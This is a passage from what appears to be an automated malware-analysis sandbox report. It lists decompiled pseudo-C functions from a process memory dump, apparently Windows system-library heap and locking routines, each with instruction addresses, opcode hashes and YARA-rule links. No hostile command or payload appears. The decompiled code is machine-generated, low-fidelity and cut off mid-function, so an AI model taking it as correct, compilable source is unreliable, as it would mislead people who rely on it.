				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0168F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0168F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01674620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                      0x01667672
                                                      0x0166767f
                                                      0x01667689
                                                      0x016676de
                                                      0x016676de
                                                      0x0166768b
                                                      0x01667691
                                                      0x01667693
                                                      0x01667697
                                                      0x00000000
                                                      0x01667699
                                                      0x016676a8
                                                      0x00000000
                                                      0x016676aa
                                                      0x016676ad
                                                      0x016676b1
                                                      0x00000000
                                                      0x016676b3
                                                      0x016676b3
                                                      0x016676b5
                                                      0x016676ba
                                                      0x016676bc
                                                      0x016676bc
                                                      0x016676c0
                                                      0x00000000
                                                      0x016676c2
                                                      0x016676ce
                                                      0x016676ce
                                                      0x016676c0
                                                      0x016676b1
                                                      0x016676a8
                                                      0x01667697
                                                      0x016676d9

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction ID: 72d9b24918a4aa5d7875257f38416d2559af7e598058549ae05f29d1c982db63
                                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction Fuzzy Hash: 4E01AC32701129ABD720DE5ECC45E5BBBADEB84664F340564BA09CB250DA30DD01C7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01659080, Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E01659080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x17485ec;
				E01672280(_t48, 0x17485ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0166FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x174538c; // 0x77f06828
					if( *_t84 != 0x1745388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x172f6e8);
						E016AD0E8(0x17485ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E017288F5(_t80, _t85, 0x1745388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x17486c0; // 0x12007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x17486b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01672280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E017288F5(0x17485ec, _t85, 0x1745388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0169AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x174b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x17484c0;
																			if(_t82 >=  *0x17484c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01729063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0165922A(_t99);
										_t64 = E01677D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01728B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x17486c0; // 0x12007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x17486b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x17486bc;
													_t87 = 0x17486b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01659240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x17486c4;
												_t87 = 0x17486c0;
												L27:
												E01689B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E016AD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1745388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x174538c = _t51;
						goto L6;
					}
				}
			}




















                                                      0x01659082
                                                      0x01659083
                                                      0x01659084
                                                      0x01659085
                                                      0x01659087
                                                      0x01659096
                                                      0x01659098
                                                      0x01659098
                                                      0x0165909e
                                                      0x016590a8
                                                      0x016590e7
                                                      0x016590e7
                                                      0x016590aa
                                                      0x016590b0
                                                      0x016590b7
                                                      0x016590bd
                                                      0x016590dd
                                                      0x016590e6
                                                      0x016590bf
                                                      0x016590bf
                                                      0x016590c7
                                                      0x016590cf
                                                      0x016590f1
                                                      0x016590f2
                                                      0x016590f4
                                                      0x016590f5
                                                      0x016590f6
                                                      0x016590f7
                                                      0x016590f8
                                                      0x016590f9
                                                      0x016590fa
                                                      0x016590fb
                                                      0x016590fc
                                                      0x016590fd
                                                      0x016590fe
                                                      0x016590ff
                                                      0x01659100
                                                      0x01659102
                                                      0x01659107
                                                      0x0165910c
                                                      0x01659110
                                                      0x01659113
                                                      0x01659115
                                                      0x01659136
                                                      0x0165913f
                                                      0x01659143
                                                      0x016b37e4
                                                      0x016b37e4
                                                      0x01659117
                                                      0x01659117
                                                      0x0165911d
                                                      0x00000000
                                                      0x0165911f
                                                      0x0165911f
                                                      0x01659125
                                                      0x00000000
                                                      0x01659127
                                                      0x0165912d
                                                      0x01659130
                                                      0x01659134
                                                      0x01659158
                                                      0x0165915d
                                                      0x01659161
                                                      0x01659168
                                                      0x016b3715
                                                      0x0165916e
                                                      0x0165916e
                                                      0x01659175
                                                      0x01659177
                                                      0x0165917e
                                                      0x0165917f
                                                      0x01659182
                                                      0x01659182
                                                      0x01659187
                                                      0x01659187
                                                      0x0165918a
                                                      0x0165918d
                                                      0x0165918f
                                                      0x01659192
                                                      0x01659195
                                                      0x01659198
                                                      0x01659198
                                                      0x01659198
                                                      0x0165919a
                                                      0x00000000
                                                      0x00000000
                                                      0x016b371f
                                                      0x016b3721
                                                      0x016b3727
                                                      0x016b372f
                                                      0x016b3733
                                                      0x016b3735
                                                      0x016b3738
                                                      0x016b373b
                                                      0x016b373d
                                                      0x016b3740
                                                      0x00000000
                                                      0x016b3746
                                                      0x016b3746
                                                      0x016b3749
                                                      0x00000000
                                                      0x016b374f
                                                      0x016b374f
                                                      0x016b3751
                                                      0x016b3757
                                                      0x016b3759
                                                      0x016b375c
                                                      0x016b375c
                                                      0x016b375e
                                                      0x016b375e
                                                      0x016b3761
                                                      0x016b3764
                                                      0x00000000
                                                      0x00000000
                                                      0x016b3766
                                                      0x016b3768
                                                      0x016b37a3
                                                      0x016b37a3
                                                      0x016b37a5
                                                      0x016b37a7
                                                      0x016b37ad
                                                      0x016b37b0
                                                      0x016b37b2
                                                      0x016b37bc
                                                      0x016b37c2
                                                      0x016b37c2
                                                      0x016b37b2
                                                      0x01659187
                                                      0x01659187
                                                      0x0165918a
                                                      0x0165918d
                                                      0x0165918f
                                                      0x01659192
                                                      0x01659195
                                                      0x00000000
                                                      0x01659195
                                                      0x00000000
                                                      0x016b376a
                                                      0x016b376a
                                                      0x016b376a
                                                      0x016b376c
                                                      0x016b376c
                                                      0x016b376f
                                                      0x016b3775
                                                      0x00000000
                                                      0x00000000
                                                      0x016b3777
                                                      0x016b3779
                                                      0x016b3782
                                                      0x016b3787
                                                      0x016b3789
                                                      0x016b3790
                                                      0x016b3790
                                                      0x016b378b
                                                      0x016b378b
                                                      0x016b378b
                                                      0x016b3792
                                                      0x016b3795
                                                      0x00000000
                                                      0x016b3795
                                                      0x00000000
                                                      0x016b3779
                                                      0x016b3798
                                                      0x00000000
                                                      0x016b3798
                                                      0x00000000
                                                      0x016b3768
                                                      0x016b379b
                                                      0x016b379b
                                                      0x016b3751
                                                      0x016b3749
                                                      0x00000000
                                                      0x016b3740
                                                      0x016591a0
                                                      0x016591a3
                                                      0x016591a9
                                                      0x016591b0
                                                      0x00000000
                                                      0x016591b0
                                                      0x01659187
                                                      0x016591b4
                                                      0x016591b4
                                                      0x016591bb
                                                      0x016591c0
                                                      0x016591c5
                                                      0x016591c7
                                                      0x016b37da
                                                      0x016591cd
                                                      0x016591cd
                                                      0x016591cd
                                                      0x016591d2
                                                      0x016591d5
                                                      0x01659239
                                                      0x01659239
                                                      0x016591d7
                                                      0x016591db
                                                      0x016591e1
                                                      0x016591e7
                                                      0x016591fd
                                                      0x01659203
                                                      0x0165921e
                                                      0x01659223
                                                      0x00000000
                                                      0x01659205
                                                      0x01659205
                                                      0x01659208
                                                      0x0165920c
                                                      0x01659214
                                                      0x01659214
                                                      0x0165920c
                                                      0x016591e9
                                                      0x016591e9
                                                      0x016591ee
                                                      0x016591f3
                                                      0x016591f3
                                                      0x016591f3
                                                      0x016591e7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01659134
                                                      0x01659125
                                                      0x0165911d
                                                      0x0165914e
                                                      0x016590d1
                                                      0x016590d1
                                                      0x016590d3
                                                      0x016590d6
                                                      0x016590d8
                                                      0x00000000
                                                      0x016590d8
                                                      0x016590cf

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 503b3c0e9221ab70e7a5be4499d38fc0e576c0497abd5303cd19c0292316c5b6
                                                      • Instruction ID: 546f42b40c39fbed718ef5fb01219d4f2300ea5a48b1ba2e0b275774b85f0674
                                                      • Opcode Fuzzy Hash: 503b3c0e9221ab70e7a5be4499d38fc0e576c0497abd5303cd19c0292316c5b6
                                                      • Instruction Fuzzy Hash: F501AFB2605605CFD3259F18DC40B22BBF9EB85729F25846AE9058B792C374DC41CBD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016EC450, Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E016EC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01699910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E016995B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E016995D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E016995D0();
				return L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                      0x016ec458
                                                      0x016ec45d
                                                      0x016ec466
                                                      0x016ec468
                                                      0x016ec469
                                                      0x016ec46a
                                                      0x016ec46b
                                                      0x016ec46e
                                                      0x016ec46f
                                                      0x016ec471
                                                      0x016ec476
                                                      0x016ec476
                                                      0x016ec47c
                                                      0x016ec47e
                                                      0x016ec480
                                                      0x016ec480
                                                      0x016ec483
                                                      0x016ec484
                                                      0x016ec486
                                                      0x016ec488
                                                      0x016ec48f
                                                      0x016ec491
                                                      0x016ec493
                                                      0x016ec493
                                                      0x016ec48f
                                                      0x016ec498
                                                      0x016ec49e
                                                      0x016ec4ad
                                                      0x016ec4ad
                                                      0x016ec4b2
                                                      0x016ec4b4
                                                      0x016ec4cd

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction ID: 46b8537630ebb89dc01e28e3f1d015eb238f0f8df8d8da581f9d198dea9d72df
                                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction Fuzzy Hash: F7019272141606FFEB21AF69CC84E63FB7EFF64395F004529F21442660CB21ACA1CAA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01724015, Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E01724015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01672280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01672280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x17486ac);
					E0165F900(0x17486d4, _t28);
					E0166FFB0(0x17486ac, _t28, 0x17486ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0166FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                      0x0172401a
                                                      0x0172401e
                                                      0x01724023
                                                      0x01724028
                                                      0x01724029
                                                      0x0172402b
                                                      0x0172402f
                                                      0x01724043
                                                      0x01724046
                                                      0x01724051
                                                      0x01724057
                                                      0x0172405f
                                                      0x01724062
                                                      0x01724067
                                                      0x0172406f
                                                      0x0172407c
                                                      0x0172407c
                                                      0x0172408c
                                                      0x0172408c
                                                      0x01724097

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 808f4c12d3aba56174d526603ad6467b6f2759fd11739a9d58d6562eb9a06ded
                                                      • Instruction ID: aa068132fd04f2e349f09f8e9e5ac00facebd1b2131ab555cd9f8378b7dda171
                                                      • Opcode Fuzzy Hash: 808f4c12d3aba56174d526603ad6467b6f2759fd11739a9d58d6562eb9a06ded
                                                      • Instruction Fuzzy Hash: B8018F722019467FD361AB69CE84E13F7ADFB55660B00026DF50887A11DB74EC52CAE8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0171138A, Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E0171138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x174d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0169FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01677D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0169B640(E01699AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                      0x0171138a
                                                      0x0171138a
                                                      0x01711399
                                                      0x017113a3
                                                      0x017113a8
                                                      0x017113aa
                                                      0x017113b5
                                                      0x017113bb
                                                      0x017113c3
                                                      0x017113c6
                                                      0x017113c9
                                                      0x017113d4
                                                      0x017113e6
                                                      0x017113d6
                                                      0x017113df
                                                      0x017113df
                                                      0x017113f1
                                                      0x017113f2
                                                      0x017113f4
                                                      0x017113f9
                                                      0x0171140e

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8d996ca5b578ab3ea19e20d00be1d4a17a56afadcd2d1855bd51e23577221f5
                                                      • Instruction ID: dc152a79508985caf62791173f82433a7480363a54a9c887fa2ba1f852a76ee3
                                                      • Opcode Fuzzy Hash: e8d996ca5b578ab3ea19e20d00be1d4a17a56afadcd2d1855bd51e23577221f5
                                                      • Instruction Fuzzy Hash: 22017571A01219AFDB14DFA9D845FAEBBB8EF54710F40405AF904EB380D674DA41C794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017114FB, Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E017114FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x174d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0169FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01677D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0169B640(E01699AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                      0x017114fb
                                                      0x017114fb
                                                      0x0171150a
                                                      0x01711514
                                                      0x01711519
                                                      0x0171151b
                                                      0x01711526
                                                      0x0171152c
                                                      0x01711534
                                                      0x01711537
                                                      0x0171153a
                                                      0x01711545
                                                      0x01711557
                                                      0x01711547
                                                      0x01711550
                                                      0x01711550
                                                      0x01711562
                                                      0x01711563
                                                      0x01711565
                                                      0x0171156a
                                                      0x0171157f

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 603782e63b2508170d2c68393a252884cfa7e00516b85f4ad2013ae5ea2e8664
                                                      • Instruction ID: 5c29de0a8520bd301fee20572db3629e3ea7ab6031b533eed92a9156346f1e99
                                                      • Opcode Fuzzy Hash: 603782e63b2508170d2c68393a252884cfa7e00516b85f4ad2013ae5ea2e8664
                                                      • Instruction Fuzzy Hash: 06019E71A00258AFCB10DFACD845EAEBBB8EF44710F40406AF904EB280DA74DA00CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016558EC, Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E016558EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x174d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1635c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01655943() != 0 &&  *0x1745320 > 5) {
					E016D7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E016D7B5E( &_v28, _t28);
					_t11 = E016D7B9C(0x1745320, 0x163bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0169B640(_t11, _t17, _v8 ^ _t29, 0x163bf15, _t27, _t28);
			}















                                                      0x016558fb
                                                      0x016558fe
                                                      0x01655906
                                                      0x0165590a
                                                      0x0165593c
                                                      0x0165593c
                                                      0x0165590c
                                                      0x0165590c
                                                      0x01655911
                                                      0x00000000
                                                      0x01655913
                                                      0x01655913
                                                      0x01655913
                                                      0x01655911
                                                      0x0165591d
                                                      0x016b1035
                                                      0x016b103c
                                                      0x016b103f
                                                      0x016b1056
                                                      0x016b1056
                                                      0x0165593b

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bcc2d7515126d6969ea9967eb0e96b5c41bb7c397f64c463eb7df8efa2cae172
                                                      • Instruction ID: 37f3059cbc8b04c324505f342b33595dd74331bce71a09e4b092ecc2cf4761a6
                                                      • Opcode Fuzzy Hash: bcc2d7515126d6969ea9967eb0e96b5c41bb7c397f64c463eb7df8efa2cae172
                                                      • Instruction Fuzzy Hash: AA018F31A001459BC724EF69EC149BE77B9EB95134F55406EAE0697344DF30DD02C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01721074, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01721074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0172165E(__ebx, 0x1748ae4, (__edx -  *0x1748b04 >> 0x14) + (__edx -  *0x1748b04 >> 0x14), __edi, __ecx, (__edx -  *0x1748b04 >> 0x14) + (__edx -  *0x1748b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0171AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01677D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0170FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                      0x01721074
                                                      0x01721080
                                                      0x01721082
                                                      0x0172108a
                                                      0x0172108f
                                                      0x01721093
                                                      0x017210ab
                                                      0x017210ab
                                                      0x017210c3
                                                      0x017210cf
                                                      0x017210e1
                                                      0x017210d1
                                                      0x017210da
                                                      0x017210da
                                                      0x017210e9
                                                      0x017210f5
                                                      0x017210f5
                                                      0x017210fe

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b17f9074da8c9f55449e9ec6b73c2b4fb23b781babb539a8ea6e495e876b7be
                                                      • Instruction ID: d898ceeb3bae42f7e7e30ecb5c92f5489c89092d4afe46be8e4715a53c5fe13d
                                                      • Opcode Fuzzy Hash: 1b17f9074da8c9f55449e9ec6b73c2b4fb23b781babb539a8ea6e495e876b7be
                                                      • Instruction Fuzzy Hash: FD014C72604786DFC721DF68C844B1AFBD5BB84310F04C529F98583295EE34D941CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0166B02A, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0166B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
